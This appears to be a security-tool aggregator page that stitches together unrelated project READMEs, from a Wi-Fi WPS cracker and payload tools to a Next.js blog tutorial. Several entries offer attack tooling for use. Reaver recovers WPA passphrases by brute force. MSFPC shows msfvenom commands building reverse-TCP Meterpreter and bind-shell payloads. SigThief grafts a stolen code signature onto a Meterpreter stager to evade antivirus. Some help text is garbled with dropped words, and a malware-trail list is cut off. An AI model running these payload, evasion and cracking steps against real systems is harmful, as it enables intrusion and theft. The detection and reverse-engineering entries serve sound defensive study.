Reaver - Wi-Fi Protected Setup Fork t6x

Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a wide variety of access points and WPS implementations.

The original Reaver implements a online brute force attack against, as described in PDF Here. reaver-wps-fork-t6x version 1.6b is a community forked version, which has included various bug fixes and additional attack method (the offline Pixie Dust attack).

Depending on the target's Access Point (AP), to recover the plain text WPA/WPA2 passphrase the average amount of time for the transitional online brute force method is between 4-10 hours. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. When using the offline attack, if the AP is vulnerable, it may take only a matter of seconds to minutes.

• The original Reaver (v1.4) can be found here: https://code.google.com/p/reaver-wps/.
• The discontinued reaver-wps-fork-t6x community edition (which includes the Pixie Dust attack. v1.5.3) is now the old-master branch from this repository
• reaver-wps-fork-t6x community edition of Reaver version 1.6b (which includes the Pixie Dust attack): Here.
• For more information about the Pixie Dust attack (including which APs are vulnerable) can be found here: Pixiewps, https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack) & https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit?usp=sharing

Requirements

apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps

You must already have Wiire's Pixiewps installed. The latest version can be found here: Downloads.

Reaver Options

-K and-or -Z // --pixie-dust (in reaver)
The -K and -Z option perform the offline attack, Pixie Dust (pixiewps), by automatically passing the PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey variables. pixiewps will then try to attack Ralink, Broadcom and Realtek detected chipset. Special note: If you are attacking a Realtek AP, do NOT use small DH Keys (-S) option. User will have to execute reaver with the cracked PIN (option -p) to get the WPA pass-phrase. This is a temporary solution and an option to do a full attack will be implemented soon

-a // --all (in wash)
The option -a of Wash will list all access points, including those without WPS enabled.

Deprecated and temporary left behind options
- n (reaver): Automatically enabled, no need to invocate it.
- W (reaver): Temporary left behind. Integration of the default PIN generators was unstable, leading to many warnings at compilation time. It was also an issue to use a PIN attempt (risk of AP rating limit) in order to get a BSSID and an ESSID. For the moment PIN generation has to be done externally using the scripts provided in "doc".
- a (reaver): This option was the only option which required sqlite3 adding an extra dependency. It was only designed for automation scripts and this task (execute the last reaver command again) can be easily done internally by the script that calls reaver
- p1 and -p2 (reaver): Too much warnings and bugs.
-H (reaver): There is a need to find a way to perform it more cleanly, work is in progress.
- vvv (reaver): The highest level of verbose is temporary removed for the same reason.
- g (wash): Option was broken in latest release and need to be seriously rethought.

Options repaired/solved issues

Issues with -g and -p (and their crossed usage) are left behind. Code is much more clean, robust and has less dependencies.

Downloads Source

Read More

MSFvenom Payload Creator (MSFPC)

MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MSFPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).

Can't remember your IP for a interface? Don't sweat it, just use the interface name: eth0.
Don't know what your external IP is? MSFPC will discover it: wan.
Want to generate one of each payload? No issue! Try: loop.
Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!
Note: This will NOT try to bypass any anti-virus solutions at any stage.

Install

$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc

$ chmod 0755 /usr/local/bin/msfpc

$ bash msfpc.sh -h -v
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

 msfpc.sh  () () () () () () () ()
   Example: msfpc.sh windows 192.168.1.10        # Windows & manual IP.
            msfpc.sh elf bind eth0 4444          # Linux, eth0's IP & manual port.
            msfpc.sh stageless cmd py https      # Python, stageless command prompt.
            msfpc.sh verbose loop eth1           # A payload for every type, using eth1's IP.
            msfpc.sh msf batch wan               # All possible Meterpreter payloads, using WAN IP.
            msfpc.sh help verbose                # Help screen, with even more information.

 :
   + APK
   + ASP
   + ASPX
   + Bash [.sh]
   + Java [.jsp]
   + Linux [.elf]
   + OSX [.macho]
   + Perl [.pl]
   + PHP
   + Powershell [.ps1]
   + Python [.py]
   + Tomcat [.war]
   + Windows [.exe // .dll]

 Rather than putting , you can do a interface and MSFPC will detect that IP address.
 Missing  will default to the IP menu.

 Missing  will default to 443.

  is a standard/native command prompt/terminal to interactive with.
  is a custom cross platform shell, gaining the full power of Metasploit.
 Missing  will default to  where possible.
   Note: Metasploit doesn't (yet!) support  for every  format.
  payloads are generally smaller than  and easier to bypass EMET. Limit Metasploit post modules/scripts support.
  payloads are generally much larger than , as it comes with more features.

  opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
  makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
 Missing  will default to .
  allows for the attacker to connect whenever they wish.  needs to the target to be repeatedly connecting back to permanent maintain access.

  splits the payload into parts, making it smaller but dependent on Metasploit.
  is the complete standalone payload. More 'stable' than .
 Missing  will default to  where possible.
   Note: Metasploit doesn't (yet!) support  for every  format.
  are 'better' in low-bandwidth/high-latency environments.
  are seen as 'stealthier' when bypassing Anti-Virus protections.  may work 'better' with IDS/IPS.
 More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
                   https://www.offensive-security.com/metasploit-unleashed/payload-types/
                   https://www.offensive-security.com/metasploit-unleashed/payloads/

  is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
  makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
  makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
  will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on .
 Missing  will default to .
 By altering the traffic, such as  and even more , it will slow down the communication & increase the payload size.
 More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

  will generate as many combinations as possible: , , ,  & 
  will just create one of each .

  will display more information.

Windows, Fully Automated Using Manual IP

$ bash msfpc.sh windows 192.168.1.10
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
  > '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!

Linux Format, Fully Automated Using Manual Interface and Port

$ ./msfpc.sh elf bind eth0 4444 verbose
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]        IP: 192.168.103.142
 [i]      PORT: 4444
 [i]      TYPE: linux (linux/x86/shell/bind_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: bind
 [i]     STAGE: staged
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \
  --platform linux -a x86 -e generic/none  LPORT=4444 \
  > '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
 [i] Size: 4.0K
 [i]  MD5: eed4623b765eea623f2e0206b63aad61
 [i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185

 [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!

Downloads Source

Read More

Bytecode-Viewer - Android APK Reverse Engineering Suite

Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more.
It's written completely in Java, and it's open sourced. It's currently being maintained and developed by Konloch.

There is also a plugin system that will allow you to interact with the loaded classfiles, for example you can write a String deobfuscator, a malicious code searcher, or something else you can think of.
You can either use one of the pre-written plugins, or write your own. It supports groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV, this allows the user to handle it completely using ASM.

Code from various projects has been used, including but not limited to:

• J-RET by WaterWolf
• JHexPane by Sam Koivu
• RSynaxPane by Robert Futrell
• Commons IO by Apache
• ASM by OW2
• FernFlower by Stiver
• Procyon by Mstrobel
• CFR by Lee Benfield
• CFIDE by Bibl
• Smali by JesusFreke
• Dex2Jar by pxb1..?
• Krakatau by Storyyeller
• JD GUI/JD Core by The Java-Decompiler Team
• Enjarify by Storyyeller

Key Features:

• Krakatau Integration for Bytecode assembly/disassembly.
• Smali/BakSmali Integration - You can now edit class files/dex files via smali!
• APK/DEX Support - Using Dex2Jar and Jar2Dex it's able to load and save APKs with ease!
• Java Decompiler - It utilizes FernFlower, Procyon and CFR for decompilation.
• Bytecode Decompiler - A modified version of CFIDE's.
• Hex Viewer - Powered by JHexPane.
• Each Decompiler/Editor/Viewer is toggleable, you can also select what will display on each pane.
• Fully Featured Search System - Search through strings, functions, variables and more!
• A Plugin System With Built In Plugins - (Show All Strings, Malicious Code Scanner, String Decrypters, etc)
• Fully Featured Scripting System That Supports Groovy.
• EZ-Inject - Graphically insert hooks and debugging code, invoke main and start the program.
• Recent Files & Recent Plugins.
• And more! Give it a try for yourself!

Command Line Input:
	-help                         Displays the help menu
	-list                         Displays the available decompilers
	-decompiler <decompiler>      Selects the decompiler, procyon by default
	-i <input file>               Selects the input file (Jar, Class, APK, ZIP, DEX all work automatically)
	-o <output file>              Selects the output file (Java or Java-Bytecode)
	-t <target classname>         Must either be the fully qualified classname or "all" to decompile all as zip
	-nowait                       Doesn't wait for the user to read the CLI messages

Downloads Source

Read More

Smith - A client/server style agent meant for testing

smith

A client/server style agent meant for testing connectivity to and from a machine on a network.

Installation

python setup.py install or pip install . should install smith. Note: If you want to use the tcp/udp protocol options, you'll need to install scapy and it's dependencies. Ubuntu has 'apt-get install python-scapy'. You can also pip install scapy, but I don't know if that installs all dependencies on all OS's. I didn't include scapy in the requires because the 'rest' option doesn't utilize it, and is sufficient for a lot of usecases on its own.

listen

$: smith listen -h
usage:
 Server-side: listen for incoming ping requests from remote client.

positional arguments:
  port            The port the remote client is pinging
  {TCP,UDP,REST}  Protocol to use to contact the remote agent.TCP and UDP use
                  raw sockets which will bypass IPTABLES rules.

optional arguments:
 '-t', '--timeout'Seconds to wait for request from client before giving up. Zero (default) means 'wait forever'
  -h, --help      show this help message and exit

Read More

FIR - Fast Incident Response

What is FIR? Who is it for?

FIR (Fast Incident Response) is an cybersecurity incident management platform designed with agility and speed in mind. It allows for easy creation, tracking, and reporting of cybersecurity incidents.

FIR is for anyone needing to track cybersecurity incidents (CSIRTs, CERTs, SOCs, etc.). It's was tailored to suit our needs and our team's habits, but we put a great deal of effort into making it as generic as possible before releasing it so that other teams around the world may also use it and customize it as they see fit.

Installation

There are two ways to install FIR. If you want to take it for a test-drive, just follow the instructions for setting up a development environment in the Wiki.

If you like it and want to set it up for production, here's how to do it.

A dockerfile for running a dev-quality FIR setup is also available in docker/Dockerfile.

Deploy to Heroku via fir/heroku_settings.py

Technical specs

FIR is written in Python (but you probably already knew that), using Django 1.9. It uses Bootstrap 3 and some Ajax and d3js to make it pretty. We use it with a MySQL back-end, but feel free to use any other DB adaptor you might want - as long as it's compatible with Django, you shouldn't run into any major issues.

FIR is not greedy performance-wise. It will run smoothly on a Ubuntu 14.04 virtual machine with 1 core, a 40 GB disk and 1 GB RAM.

Downloads Source

Read More

SigThief - Stealing Signatures and Making One Invalid Signature at a Time

SigThief.

I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.

In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file. Of course it's not a valid signature and that's the point!

How to use

Usage

Usage: sigthief.py [options]

Options:
  -h, --help            show this help message and exit
  -i FILE, --file=FILE  file still signature from
  -r, --rip             rip signature off inputfile
  -a, --add             add signautre to targetfile
  -o OUTPUTFILE, --output=OUTPUTFILE
                        output file
  -s SIGFILE, --sig=SIGFILE
                        binary signature from disk
  -t TARGETFILE, --target=TARGETFILE
                        file to append signature too
  -c, --checksig        file to check if signed; does not verify signature
  -T, --truncate        truncate signature (i.e. remove sig)

Take a Signature from a binary and add it to another binary

$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe
Output file: /tmp/msftesting_tcpview.exe
Signature appended.
FIN.

Save Signature to disk for use later

$ ./sigthief.py -i tcpview.exe -r                                                       
Ripping signature to file!
Output file: tcpview.exe_sig
Signature ripped.
FIN.

Use the ripped signature

$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                             
Output file: x86_meterpreter_stager.exe_signed
Signature appended.
FIN.

Truncate (remove) signature

This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)

$ ./sigthief.py -i tcpview.exe -T   
Inputfile is signed!
Output file: tcpview.exe_nosig
Overwriting certificate table pointer and truncating binary
Signature removed.
FIN.

Check if there is a signature (does not check validity)

$ ./sigthief.py -i tcpview.exe -c
Inputfile is signed!

Downloads

Read More

BARF : Binary Analysis and Reverse engineering Framework

BARF.

The analysis of binary code is a crucial activity in many areas of the computer sciences and software engineering disciplines ranging from software security and program analysis to reverse engineering. Manual binary analysis is a difficult and time-consuming task and there are software tools that seek to automate or assist human analysts. However, most of these tools have several technical and commercial restrictions that limit access and use by a large portion of the academic and practitioner communities. BARF is an open source binary analysis framework that aims to support a wide range of binary code analysis tasks that are common in the information security discipline. It is a scriptable platform that supports instruction lifting from multiple architectures, binary translation to an intermediate representation, an extensible framework for code analysis plugins and interoperation with external tools such as debuggers, SMT solvers and instrumentation tools. The framework is designed primarily for human-assisted analysis but it can be fully automated.

The BARF project includes BARF and related tools and packages. So far the project is composed of the following items:

• BARF : A multiplatform open source Binary Analysis and Reverse engineering Framework
• PyAsmJIT : A JIT for the Intel x86_64 and ARM architecture.
• Tools built upon BARF:
• BARFgadgets : Lets you search, classifiy and verify ROP gadgets inside a binary program.
• BARFcfg : Lets you recover the control-flow graph of the functions of a binary program.
• BARFcg : Lets you recover the call graph of the functions of a binary program.

For more information, see:

• BARF: A multiplatform open source Binary Analysis and Reverse engineering Framework (Whitepaper) [en]
• BARFing Gadgets (ekoparty2014 presentation)

Downloads Master.zip | Demo Install

Quickstart

This is a very simple example which shows how to open a binary file and print each instruction with its translation to the intermediate language (REIL).

from barf import BARF

# Open binary file.
barf = BARF("examples/bin/x86/branch1")

# Print assembly instruction.
for addr, asm_instr, reil_instrs in barf.translate():
    print("0x{addr:08x} {instr}".format(addr=addr, instr=asm_instr))

    # Print REIL translation.
    for reil_instr in reil_instrs:
        print("{indent:11s} {instr}".format(indent="", instr=reil_instr))

We can also recover the CFG and save it to a .dot file.

# Recover CFG.
cfg = barf.recover_cfg()

# Save CFG to a .dot file.
cfg.save("branch1_cfg")

We can check restrictions on code using a SMT solver. For instance, suppose you have the following code:

 80483ed:       55                      push   ebp
 80483ee:       89 e5                   mov    ebp,esp
 80483f0:       83 ec 10                sub    esp,0x10
 80483f3:       8b 45 f8                mov    eax,DWORD PTR [ebp-0x8]
 80483f6:       8b 55 f4                mov    edx,DWORD PTR [ebp-0xc]
 80483f9:       01 d0                   add    eax,edx
 80483fb:       83 c0 05                add    eax,0x5
 80483fe:       89 45 fc                mov    DWORD PTR [ebp-0x4],eax
 8048401:       8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]
 8048404:       c9                      leave
 8048405:       c3                      ret

And you want to know what values you have to assign to memory locations ebp-0x4, ebp-0x8 and ebp-0xc in order to obtain a specific value in eax register after executing the code.

First, we add the instructions to the analyzer component.

from barf import BARF

# Open ELF file
barf = BARF("examples/bin/x86/constraint1")

# Add instructions to analyze.
for addr, asm_instr, reil_instrs in barf.translate(0x80483ed, 0x8048401):
    for reil_instr in reil_instrs:
        barf.code_analyzer.add_instruction(reil_instr)

Then, we generate expressions for each variable of interest

# Get smt expression for eax and ebp registers
eap = barf.code_analyzer.get_register_expr("eax")
ebp = barf.code_analyzer.get_register_expr("ebp")

# Get smt expressions for memory locations (each one of 4 bytes)
a = barf.code_analyzer.get_memory_expr(ebp-0x8, 4)
b = barf.code_analyzer.get_memory_expr(ebp-0xc, 4)
c = barf.code_analyzer.get_memory_expr(ebp-0x4, 4)

And add the desired restrictions on them.

# Set range for variables
barf.code_analyzer.set_preconditions([a >= 2, a <= 100])
barf.code_analyzer.set_preconditions([b >= 2, b <= 100])

# Set desired value for the result
barf.code_analyzer.set_postcondition(c == 13)

Finally, we check is the restrictions we establish can be resolved.

# Check satisfiability.
if barf.code_analyzer.check() == 'sat':
    print("SAT!")

    # Get concrete value for expressions.
    eax_val = barf.code_analyzer.get_expr_value(eax)
    a_val = barf.code_analyzer.get_expr_value(a)
    b_val = barf.code_analyzer.get_expr_value(b)
    c_val = barf.code_analyzer.get_expr_value(c)

    # Print values.
    print("eax : 0x{0:%08x} ({0})".format(eax_val))
    print("ebp : 0x{0:%08x} ({0})".format(ebp_val))
    print("  a : 0x{0:%08x} ({0})".format(a_val))
    print("  b : 0x{0:%08x} ({0})".format(b_val))
    print("  c : 0x{0:%08x} ({0})".format(c_val))
else:
    print("UNSAT!")

You can see these and more examples in the examples directory.

Read More

WebFundamentals - Best practices for modern web development

Web Fundamentals on DevSite

new WebFundamentals! An effort to showcase best practices and tools for modern Web Development.

WebFundamentals

What's changed?

• We're now using the DevSite infrastructure
• New style guide
• New widgets allow inline JavaScript, common links, related guide and more
• Jekyll has been eliminated, instead pages are rendered at request time
• Front-matter has been eliminated from the markdown, but files now require a simple set of tags

What stays the same?

• GitHub is still our source of truth for content,
• We want your contributions, either PRs, issues, whatever!
• The latest is staged at https://web-central.appspot.com/web/

Cloning the repo

If you have a high-bandwidth connection, I recommend starting with a fresh clone of the repo.

https://github.com/j00tesiD/WebFundamentals.git

Getting set up

The new DevSite infrastructure simplifies the dependencies a lot. Ensure you have a recent version of Node and the AppEngine SDK for Python already installed.

Run npm install (needed for the build process)

Build the auto-generated files

Some files (contributors includes, some pages for updates, showcases, etc) are automatically generated. The first time you clone the repo and run npm install, this is done for you. However, when you add a case study, update, etc., you'll need to re-build those files using:

npm run build

Update the code labs

To update the Code Labs, you'll need the claat tool, and access to the original Doc files. This will likely only work for Googlers.

• Download the claat tool and place it in your tools directory.
• Run tools/update-codelabs.sh
• Check the latest changes into GitHub

Start the development server

Run npm start

Test your changes before submitting a PR

Please run your changes through npm test before submitting a PR. The test looks for things that may cause issues with DevSite and tries to keep our content consistent. It's part of the deployment process, so PRs will fail if there are any errors! To run:
npm test

Read More

Building a Blog With Next.js and Styled-Components

Next.js is an awesome new framework for building universal React applications. In simple terms, that means you can use React to render templates on the server, as well front-end components the way you’re most likely used to. The advantages of this are numerous (shared components, faster rendering, great tooling), but getting it all to work properly is generally a pain.

Next.js makes this process easy, and with the release of V3 I thought I’d whip up a blog to learn and demonstrate how it works. In this tutorial we’ll be using the following:

• next (3.X)
• styled-components (phenomenal css-in-js solution)
• next-routes (middleware for expressive routes in next)
• express (for serving our pages, although you can also do static exports)

I’d highly recommend you follow along with the github repo here https://github.com/timberio/next-go/, as some components are left out for the sake of brevity.

1. Getting Started

Getting set up is simple, you can follow along in the docs but the gist of it is to install next, react, and react-dom, add a simple build script and create your index file.

yarn add next@beta react react-dom --save

Add the following scripts to your package.json

{
  "scripts": {
    "dev": "next",
    "build": "next build",
    "start": "next start"
  }
}

Then create an index.js file inside of a pages folder in the root

// ./pages/index.js

export default () => (
  <div>Welcome to next.js!</div>
)

Then you can just run yarn dev and you should be up and running on localhost:3000. Hot reloading is baked in by default, which you can peek at if you inspect the .next folder in your root directory.

2. Adding Some Style

Next up we’ll configure styled-components to style our blog.
First run

yarn add styled-components.

Then create a custom _document.js file in the root with the following:
https://gist.github.com/a8711187724db5ac96b4c4e391f245a5
The custom _document.js allows us to override the default page layout and inject our own styles and markup surrouding our react app.

3. Creating a Layout

Now let’s create a main layout which all of our blog views will use, put the following in layouts/Main.js:

/* layouts/Main.js */

import Head from 'next/head'
import Wrapper from './Wrapper'
import Nav from 'components/Nav'
import Footer from 'components/Footer'

export default ({ children, title = 'This is the default title' }) => (
  <Wrapper>
    <Head>
      <title>{ title }</title>
    </Head>
    <header>
      <Nav />
    </header>

    <main>
      { children }
    </main>

    <Footer>
      Footer
    </Footer>
  </Wrapper>
)

We’ll use this layout to wrap our pages, which can override the <Head> tags and render content into the { children } block.

4. Rendering Posts

Now that we have our layout set up, let’s modify our index.js page to take advantage of it, and also render some posts.
Update pages/index.js with the following:

import React from 'react'
import Layout from 'layouts/Main';
import { getPosts } from 'api/posts'
import { Link } from 'routes'

import Post from 'components/Post'

const IndexPage = ({ posts }) => (
  <Layout>
    <ul>
      {posts.map(p => (
        <Post key={p.title} post={p} />
      ))}
    </ul>
  </Layout>
)

IndexPage.getInitialProps = async ({ req }) => {
  const res = await getPosts()
  const json = await res.json()
  return { posts: json }
}

export default IndexPage

The key here is the getInitialProps on our IndexPage component, which fetches all of the required data needed for this page to render. When this page is accessed directly at localhost:3000, Next will take care of fetching the data before the page is rendered. If we're navigating to this page from another one, no additional page reloads will happen, Next's clientside routing will take over and fetch the data for us before rendering the component thanks to the Link component. You can even add the prefetch property to tell Next to prefetch that page for blazing fast page loads.
Now we’ll use some sample json and place the api in api/posts/index.js:
undefined
And add our Post component in components/Post/index.js:

import React from 'react'
import { Link } from 'routes'
import Wrapper from './Wrapper'

const PostItem = ({ post }) => (
  <Wrapper>
    <Link route='post' params={{ slug: post.title }}>
      <a>
        <h3>{post.title}</h3>
        <p>{post.body}</p>
      </a>
    </Link>
  </Wrapper>
)

export default PostItem

When you reload the page you should see a list of posts getting rendered by our index page like so (you can see the styles in the github repo https://github.com/timberio/next-go/).

5. Post Pages

Now that we have a list of posts, lets add a route to view each individual post. Create a new page in pages/Post.js like so:

import React from 'react'
import Link from 'next/link'
import styled from 'styled-components'
import Layout from 'layouts/Main';
import { getPost } from 'api/posts'

const PostPage = ({ post }) => (
  <Layout>
   <h1>{post.title}</h1>
   <p>{post.body}</p>
  </Layout>
)

PostPage.getInitialProps = async ({ query }) => {
  const res = await getPost(query.slug)
  const json = await res.json()
  return { post: json[0] }
}

export default PostPage

This page is reponsible for fetching and rendering individual posts, so let’s add a route to show it. We’ll be using next-routes for some nice expressive route definitions, so simply run:

yarn add next-routes

and add a routes.js folder in the root with the following:

const nextRoutes = require('next-routes')
const routes = module.exports = nextRoutes()

routes.add('index', '/')
routes.add('post', '/blog/:slug')

Then make sure to add this middleware in ./server.js

const express = require('express')
const next = require('next')
const routes = require('./routes')

const dev = process.env.NODE_ENV !== 'production'
const app = next({ dev })
const handle = app.getRequestHandler()
const handler = routes.getRequestHandler(app)

app.prepare()
.then(() => {
  const server = express()
  server.use(handler)

  server.get('*', (req, res) => {
    return handle(req, res)
  })

  server.listen(3000, (err) => {
    if (err) throw err
    console.log('> Ready on http://localhost:3000')
  })
})

Now our <Link route='post' params={{ slug: post.title }}> components in pages/index.js will map to this page with the proper params and if you click on one you should see something like this:
That’s it! You can easily sub in your own endpoints in api/posts/index.js to fetch from your API or CMS of choice.
You can see a working demo at https://next-go.now.sh/ and view the code at https://github.com/timberio/next-go. You can also learn more about Next at https://learnnextjs.com/.
published at https://timber.io/blog/building-a-blog-with-next-js & https://medium.com/styled-components/building-a-blog-with-next-js-359cf1236574

Read More

Malicious Traffic Detection System 101Scratch

Introduction

Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g. http://109.162.38.120/harsh02.exe for known malicious executable), IP address (e.g. 185.130.5.231 for known attacker) or HTTP User-Agent header value (e.g. sqlmap for automatic SQL injection and database takeover tool). Also, it uses (optional) advanced heuristic mechanisms that can help in discovery of unknown threats (e.g. new malware).

Malicious Traffic Detection System.

The following (black)lists (i.e. feeds) are being utilized:

alienvault, autoshun, badips, bambenekconsultingc2dns,
bambenekconsultingc2ip, bambenekconsultingdga, bitcoinnodes,
blocklist, botscout, bruteforceblocker, ciarmy, cruzit,
cybercrimetracker, deepviz, dataplanesipinvitation,
dataplanesipquery, dataplane, dshielddns, dshieldip,
emergingthreatsbot, emergingthreatscip, emergingthreatsdns,
feodotrackerdns, malwaredomainlist, malwaredomains, malwarepatrol,
maxmind, myip, nothink, openbl, openphish, packetmailcarisirt,
packetmailramnode, palevotracker, policeman, proxylists, proxyrss,
proxy, ransomwaretrackerdns, ransomwaretrackerip,
ransomwaretrackerurl, riproxies, rutgers, sblam, securityresearch,
snort, socksproxy, sslipbl, sslproxies, torproject, torstatus,
turris, urlvir, voipbl, vxvault, zeustrackerdns, zeustrackerip,
zeustrackermonitor, zeustrackerurl, etc.

As of static entries, the trails for the following malicious entities (e.g. malware C&Cs or sinkholes) have been manually included (from various AV reports and personal research):

aboc, adwind, alienspy, almalocker, alureon, android_acecard,
android_adrd, android_alienspy, android_arspam,
android_backflash, android_basebridge, android_boxer,
android_chuli, android_claco, android_coolreaper,
android_counterclank, android_cyberwurx, android_dendoroid,
android_dougalek, android_droidjack, android_droidkungfu,
android_enesoluty, android_ewalls, android_exprespam,
android_fakebanco, android_fakedown, android_fakeinst,
android_fakelog, android_fakemart, android_fakemrat,
android_fakeneflic, android_fakesecsuit, android_feabme,
android_flexispy, android_frogonal, android_geinimi,
android_ghostpush, android_ginmaster, android_gmaster,
android_godwon, android_golddream, android_gonesixty,
android_ibanking, android_kemoge, android_lockdroid,
android_lovetrap, android_maistealer, android_maxit,
android_oneclickfraud, android_opfake, android_ozotshielder,
android_pikspam, android_pjapps, android_qdplugin,
android_repane, android_roidsec, android_samsapo,
android_sandorat, android_selfmite, android_simplocker,
android_skullkey, android_sndapps, android_spytekcell,
android_stealer, android_stels, android_teelog, android_tetus,
android_tonclank, android_torec, android_uracto,
android_usbcleaver, android_walkinwat, android_windseeker,
android_zertsecurity, androm, andromem, angler, anuna, arec,
aridviper, artro, autoit, avalanche, avrecon, axpergle, babar,
bachosens, badblock, balamid, bamital, bankapol, bankpatch,
banloa, banprox, bayrob, bedep, blackenergy, blackvine,
blockbuster, bredolab, bubnix, bucriv, buterat, camerashy,
carbanak, carberp, careto, casper, cerber, changeup, chanitor,
chekua, cheshire, chewbacca, chisbur, cleaver, cloud_atlas,
conficker, contopee, copykittens, corebot, cosmicduke,
couponarific, criakl, cridex, crilock, cryakl, cryptinfinite,
cryptodefense, cryptolocker, cryptowall, ctblocker, cutwail,
darkhotel, defru, desertfalcon, destory, dnschanger,
dnsmessenger, dnstrojan, dorifel, dorkbot, drapion, dridex,
dukes, dursg, dyreza, elf_aidra, elf_billgates, elf_darlloz,
elf_ekoms, elf_fysbis, elf_groundhog, elf_hacked_mint,
elf_mayhem, elf_mokes, elf_pinscan, elf_rekoobe, elf_shelldos,
elf_sshscan, elf_themoon, elf_turla, elf_xnote, elf_xorddos,
elpman, emogen, emotet, equation, evilbunny, ewind, expiro,
fakeav, fakeran, fantom, fareit, fbi_ransomware, fiexp,
fignotok, fin4, finfisher, fraudload, fynloski, fysna, gamarue,
gauss, gbot, generic, golroted, gozi, groundbait, harnig,
hawkeye, helompy, hiloti, hinired, htran, immortal, injecto,
ios_keyraider, ios_muda, ios_oneclickfraud, ios_specter,
ismdoor, jenxcus, kegotip, keydnap, kingslayer, kolab,
koobface, korgo, korplug, kovter, kradellsh, kulekmoko,
lazarus, locky, lollipop, lotus_blossom, luckycat, majikpos,
malwaremustdie, marsjoke, mdrop, mebroot, mestep, mhretriev,
miniduke, misogow, modpos, morto, nanocor, nbot, necurs,
nemeot, neshuta, nettraveler, netwire, neurevt, nexlogger,
nivdort, nonbolqu, nuqel, nwt, nymaim, odcodc, oficla, onkods,
optima, osx_keranger, osx_keydnap, osx_salgorea,
osx_wirelurker, palevo, pdfjsc, pegasus, pepperat, phytob,
picgoo, pift, plagent, plugx, ponmocup, poshcoder, potao,
powelike, proslikefan, pushdo, pykspa, qakbot, quasar, ramnit,
ransirac, reactorbot, redoctober, redsip, remcos, renocide,
reveton, revetrat, rovnix, runforestrun, russian_doll, rustock,
sakurel, sality, satana, sathurbot, scarcruft, scarletmimic,
scieron, seaduke, sednit, sefnit, selfdel, shifu, shylock,
